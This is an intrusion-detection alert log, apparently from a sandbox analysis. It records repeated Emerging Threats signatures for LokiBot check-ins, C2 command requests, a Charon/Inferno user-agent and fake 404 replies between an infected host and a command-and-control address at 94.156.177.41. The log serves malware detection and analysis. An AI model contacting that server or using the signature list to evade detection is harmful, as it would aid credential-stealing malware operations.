2025-01-07T12:33:19.388466+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49974	TCP
2025-01-07T12:33:19.538604+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49985	94.156.177.41	80	TCP
2025-01-07T12:33:19.538604+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49985	94.156.177.41	80	TCP
2025-01-07T12:33:19.538604+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49985	94.156.177.41	80	TCP
2025-01-07T12:33:20.262019+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49985	94.156.177.41	80	TCP
2025-01-07T12:33:20.262019+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49985	94.156.177.41	80	TCP
2025-01-07T12:33:20.267460+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49985	TCP
2025-01-07T12:33:20.414906+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49991	94.156.177.41	80	TCP
2025-01-07T12:33:20.414906+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49991	94.156.177.41	80	TCP
2025-01-07T12:33:20.414906+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49991	94.156.177.41	80	TCP
2025-01-07T12:33:21.160919+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49991	94.156.177.41	80	TCP
2025-01-07T12:33:21.160919+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49991	94.156.177.41	80	TCP
2025-01-07T12:33:21.183793+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49991	TCP
2025-01-07T12:33:21.330905+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49997	94.156.177.41	80	TCP
2025-01-07T12:33:21.330905+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49997	94.156.177.41	80	TCP
2025-01-07T12:33:21.330905+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49997	94.156.177.41	80	TCP
2025-01-07T12:33:22.097407+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49997	94.156.177.41	80	TCP
2025-01-07T12:33:22.097407+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49997	94.156.177.41	80	TCP
2025-01-07T12:33:22.102226+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49997	TCP
2025-01-07T12:33:22.254058+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50003	94.156.177.41	80	TCP
2025-01-07T12:33:22.254058+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50003	94.156.177.41	80	TCP
2025-01-07T12:33:22.254058+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50003	94.156.177.41	80	TCP
2025-01-07T12:33:22.988429+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50003	94.156.177.41	80	TCP
2025-01-07T12:33:22.988429+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50003	94.156.177.41	80	TCP
2025-01-07T12:33:22.993264+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50003	TCP
2025-01-07T12:33:23.161672+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50010	94.156.177.41	80	TCP
2025-01-07T12:33:23.161672+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50010	94.156.177.41	80	TCP
2025-01-07T12:33:23.161672+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50010	94.156.177.41	80	TCP
2025-01-07T12:33:23.905645+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50010	94.156.177.41	80	TCP
2025-01-07T12:33:23.905645+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50010	94.156.177.41	80	TCP
2025-01-07T12:33:23.910512+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50010	TCP
2025-01-07T12:33:24.052352+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50019	94.156.177.41	80	TCP
2025-01-07T12:33:24.052352+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50019	94.156.177.41	80	TCP
2025-01-07T12:33:24.052352+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50019	94.156.177.41	80	TCP
2025-01-07T12:33:24.785850+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50019	94.156.177.41	80	TCP
2025-01-07T12:33:24.785850+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50019	94.156.177.41	80	TCP
2025-01-07T12:33:24.790680+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50019	TCP
2025-01-07T12:33:24.970591+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50026	94.156.177.41	80	TCP
2025-01-07T12:33:24.970591+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50026	94.156.177.41	80	TCP
2025-01-07T12:33:24.970591+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50026	94.156.177.41	80	TCP
2025-01-07T12:33:25.726265+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50026	94.156.177.41	80	TCP
2025-01-07T12:33:25.726265+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50026	94.156.177.41	80	TCP
2025-01-07T12:33:25.731038+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50026	TCP
2025-01-07T12:33:25.885204+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50032	94.156.177.41	80	TCP
2025-01-07T12:33:25.885204+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50032	94.156.177.41	80	TCP
2025-01-07T12:33:25.885204+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50032	94.156.177.41	80	TCP
2025-01-07T12:33:26.611215+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50032	94.156.177.41	80	TCP
2025-01-07T12:33:26.611215+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50032	94.156.177.41	80	TCP
2025-01-07T12:33:26.615954+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50032	TCP
2025-01-07T12:33:26.771343+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50038	94.156.177.41	80	TCP
2025-01-07T12:33:26.771343+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50038	94.156.177.41	80	TCP
2025-01-07T12:33:26.771343+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50038	94.156.177.41	80	TCP
2025-01-07T12:33:27.495067+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50038	94.156.177.41	80	TCP
2025-01-07T12:33:27.495067+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50038	94.156.177.41	80	TCP
2025-01-07T12:33:27.509460+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50038	TCP
2025-01-07T12:33:27.680964+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50045	94.156.177.41	80	TCP
2025-01-07T12:33:27.680964+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50045	94.156.177.41	80	TCP
2025-01-07T12:33:27.680964+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50045	94.156.177.41	80	TCP
2025-01-07T12:33:28.406726+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50045	94.156.177.41	80	TCP
2025-01-07T12:33:28.406726+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50045	94.156.177.41	80	TCP
2025-01-07T12:33:28.411500+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50045	TCP
2025-01-07T12:33:28.568840+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50054	94.156.177.41	80	TCP
2025-01-07T12:33:28.568840+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50054	94.156.177.41	80	TCP
2025-01-07T12:33:28.568840+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50054	94.156.177.41	80	TCP
2025-01-07T12:33:29.321667+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50054	94.156.177.41	80	TCP
2025-01-07T12:33:29.321667+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50054	94.156.177.41	80	TCP
2025-01-07T12:33:29.326539+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50054	TCP
2025-01-07T12:33:29.482591+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50060	94.156.177.41	80	TCP
2025-01-07T12:33:29.482591+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50060	94.156.177.41	80	TCP
2025-01-07T12:33:29.482591+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50060	94.156.177.41	80	TCP
2025-01-07T12:33:30.200229+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50060	94.156.177.41	80	TCP
2025-01-07T12:33:30.200229+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50060	94.156.177.41	80	TCP
2025-01-07T12:33:30.205109+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50060	TCP
2025-01-07T12:33:30.418199+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50067	94.156.177.41	80	TCP
2025-01-07T12:33:30.418199+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50067	94.156.177.41	80	TCP
2025-01-07T12:33:30.418199+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50067	94.156.177.41	80	TCP
2025-01-07T12:33:31.133820+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50067	94.156.177.41	80	TCP
2025-01-07T12:33:31.133820+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50067	94.156.177.41	80	TCP
2025-01-07T12:33:31.138590+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50067	TCP
2025-01-07T12:33:31.283218+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50073	94.156.177.41	80	TCP
2025-01-07T12:33:31.283218+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50073	94.156.177.41	80	TCP
2025-01-07T12:33:31.283218+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50073	94.156.177.41	80	TCP
2025-01-07T12:33:32.021373+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50073	94.156.177.41	80	TCP
2025-01-07T12:33:32.021373+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50073	94.156.177.41	80	TCP
2025-01-07T12:33:32.026118+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50073	TCP
2025-01-07T12:33:32.183439+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50079	94.156.177.41	80	TCP
2025-01-07T12:33:32.183439+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50079	94.156.177.41	80	TCP
2025-01-07T12:33:32.183439+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50079	94.156.177.41	80	TCP
2025-01-07T12:33:32.920405+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50079	94.156.177.41	80	TCP
2025-01-07T12:33:32.920405+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50079	94.156.177.41	80	TCP
2025-01-07T12:33:32.925198+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50079	TCP
2025-01-07T12:33:33.064766+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50086	94.156.177.41	80	TCP
2025-01-07T12:33:33.064766+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50086	94.156.177.41	80	TCP
2025-01-07T12:33:33.064766+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50086	94.156.177.41	80	TCP
2025-01-07T12:33:33.838131+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50086	94.156.177.41	80	TCP
2025-01-07T12:33:33.838131+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50086	94.156.177.41	80	TCP
2025-01-07T12:33:33.842894+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50086	TCP
2025-01-07T12:33:33.993234+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50094	94.156.177.41	80	TCP
2025-01-07T12:33:33.993234+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50094	94.156.177.41	80	TCP
2025-01-07T12:33:33.993234+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50094	94.156.177.41	80	TCP
2025-01-07T12:33:34.750375+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50094	94.156.177.41	80	TCP
2025-01-07T12:33:34.750375+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50094	94.156.177.41	80	TCP
2025-01-07T12:33:34.755137+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50094	TCP
2025-01-07T12:33:34.894254+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50100	94.156.177.41	80	TCP
2025-01-07T12:33:34.894254+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50100	94.156.177.41	80	TCP
2025-01-07T12:33:34.894254+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50100	94.156.177.41	80	TCP
2025-01-07T12:33:35.663277+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50100	94.156.177.41	80	TCP
2025-01-07T12:33:35.663277+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50100	94.156.177.41	80	TCP
2025-01-07T12:33:35.668143+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50100	TCP
2025-01-07T12:33:35.815203+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50106	94.156.177.41	80	TCP
2025-01-07T12:33:35.815203+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50106	94.156.177.41	80	TCP
2025-01-07T12:33:35.815203+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50106	94.156.177.41	80	TCP
2025-01-07T12:33:36.542571+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50106	94.156.177.41	80	TCP
2025-01-07T12:33:36.542571+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50106	94.156.177.41	80	TCP
2025-01-07T12:33:36.547440+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50106	TCP
2025-01-07T12:33:36.704614+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50112	94.156.177.41	80	TCP
2025-01-07T12:33:36.704614+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50112	94.156.177.41	80	TCP
2025-01-07T12:33:36.704614+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50112	94.156.177.41	80	TCP
2025-01-07T12:33:37.462301+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50112	94.156.177.41	80	TCP
2025-01-07T12:33:37.462301+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50112	94.156.177.41	80	TCP
2025-01-07T12:33:37.467122+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50112	TCP
2025-01-07T12:33:37.618568+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50114	94.156.177.41	80	TCP
2025-01-07T12:33:37.618568+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50114	94.156.177.41	80	TCP
2025-01-07T12:33:37.618568+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50114	94.156.177.41	80	TCP
2025-01-07T12:33:38.351026+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50114	94.156.177.41	80	TCP
2025-01-07T12:33:38.351026+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50114	94.156.177.41	80	TCP
2025-01-07T12:33:38.356590+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50114	TCP
2025-01-07T12:33:38.510581+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50115	94.156.177.41	80	TCP
2025-01-07T12:33:38.510581+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50115	94.156.177.41	80	TCP
2025-01-07T12:33:38.510581+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50115	94.156.177.41	80	TCP
2025-01-07T12:33:39.277673+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50115	94.156.177.41	80	TCP
2025-01-07T12:33:39.277673+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50115	94.156.177.41	80	TCP
2025-01-07T12:33:39.284335+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50115	TCP
2025-01-07T12:33:39.427169+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50116	94.156.177.41	80	TCP
2025-01-07T12:33:39.427169+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50116	94.156.177.41	80	TCP
2025-01-07T12:33:39.427169+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50116	94.156.177.41	80	TCP
2025-01-07T12:33:40.149202+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50116	94.156.177.41	80	TCP
2025-01-07T12:33:40.149202+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50116	94.156.177.41	80	TCP
2025-01-07T12:33:40.154005+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50116	TCP
2025-01-07T12:33:40.300156+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50117	94.156.177.41	80	TCP
2025-01-07T12:33:40.300156+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50117	94.156.177.41	80	TCP
2025-01-07T12:33:40.300156+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50117	94.156.177.41	80	TCP
2025-01-07T12:33:41.026481+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50117	94.156.177.41	80	TCP
2025-01-07T12:33:41.026481+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50117	94.156.177.41	80	TCP
2025-01-07T12:33:41.031213+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50117	TCP
2025-01-07T12:33:41.178680+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50118	94.156.177.41	80	TCP
2025-01-07T12:33:41.178680+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50118	94.156.177.41	80	TCP
2025-01-07T12:33:41.178680+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50118	94.156.177.41	80	TCP
2025-01-07T12:33:42.069136+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50118	94.156.177.41	80	TCP
2025-01-07T12:33:42.069136+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50118	94.156.177.41	80	TCP
2025-01-07T12:33:42.073941+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50118	TCP
2025-01-07T12:33:42.221421+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50119	94.156.177.41	80	TCP
2025-01-07T12:33:42.221421+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50119	94.156.177.41	80	TCP
2025-01-07T12:33:42.221421+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50119	94.156.177.41	80	TCP
2025-01-07T12:33:42.943866+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50119	94.156.177.41	80	TCP
2025-01-07T12:33:42.943866+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50119	94.156.177.41	80	TCP
2025-01-07T12:33:42.948672+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50119	TCP
2025-01-07T12:33:43.104720+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50120	94.156.177.41	80	TCP
2025-01-07T12:33:43.104720+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50120	94.156.177.41	80	TCP
2025-01-07T12:33:43.104720+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50120	94.156.177.41	80	TCP
2025-01-07T12:33:43.909799+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50120	94.156.177.41	80	TCP
2025-01-07T12:33:43.909799+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50120	94.156.177.41	80	TCP
2025-01-07T12:33:43.915043+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50120	TCP
2025-01-07T12:33:44.073014+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50121	94.156.177.41	80	TCP
2025-01-07T12:33:44.073014+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50121	94.156.177.41	80	TCP
2025-01-07T12:33:44.073014+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50121	94.156.177.41	80	TCP
2025-01-07T12:33:44.821678+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50121	94.156.177.41	80	TCP
2025-01-07T12:33:44.821678+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50121	94.156.177.41	80	TCP
2025-01-07T12:33:44.826511+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50121	TCP
2025-01-07T12:33:44.978438+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50122	94.156.177.41	80	TCP
2025-01-07T12:33:44.978438+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50122	94.156.177.41	80	TCP
2025-01-07T12:33:44.978438+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50122	94.156.177.41	80	TCP
2025-01-07T12:33:45.694009+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50122	94.156.177.41	80	TCP
2025-01-07T12:33:45.694009+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50122	94.156.177.41	80	TCP
2025-01-07T12:33:45.698774+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50122	TCP
2025-01-07T12:33:45.848723+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50123	94.156.177.41	80	TCP
2025-01-07T12:33:45.848723+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50123	94.156.177.41	80	TCP
2025-01-07T12:33:45.848723+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50123	94.156.177.41	80	TCP
2025-01-07T12:33:46.585711+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50123	94.156.177.41	80	TCP
2025-01-07T12:33:46.585711+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50123	94.156.177.41	80	TCP
2025-01-07T12:33:46.590607+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50123	TCP
2025-01-07T12:33:46.736292+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50124	94.156.177.41	80	TCP
2025-01-07T12:33:46.736292+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50124	94.156.177.41	80	TCP
2025-01-07T12:33:46.736292+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50124	94.156.177.41	80	TCP
2025-01-07T12:33:47.641378+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50124	94.156.177.41	80	TCP
2025-01-07T12:33:47.641378+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50124	94.156.177.41	80	TCP
2025-01-07T12:33:47.646236+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50124	TCP
2025-01-07T12:33:47.784973+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50125	94.156.177.41	80	TCP
2025-01-07T12:33:47.784973+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50125	94.156.177.41	80	TCP
2025-01-07T12:33:47.784973+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50125	94.156.177.41	80	TCP
2025-01-07T12:33:48.495517+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50125	94.156.177.41	80	TCP
2025-01-07T12:33:48.495517+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50125	94.156.177.41	80	TCP
2025-01-07T12:33:48.501354+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50125	TCP
2025-01-07T12:33:48.642095+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50126	94.156.177.41	80	TCP
2025-01-07T12:33:48.642095+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50126	94.156.177.41	80	TCP
2025-01-07T12:33:48.642095+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50126	94.156.177.41	80	TCP
2025-01-07T12:33:49.400961+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50126	94.156.177.41	80	TCP
2025-01-07T12:33:49.400961+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50126	94.156.177.41	80	TCP
2025-01-07T12:33:49.405760+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50126	TCP
2025-01-07T12:33:49.553437+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50127	94.156.177.41	80	TCP
2025-01-07T12:33:49.553437+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50127	94.156.177.41	80	TCP
2025-01-07T12:33:49.553437+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50127	94.156.177.41	80	TCP
2025-01-07T12:33:50.308279+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50127	94.156.177.41	80	TCP
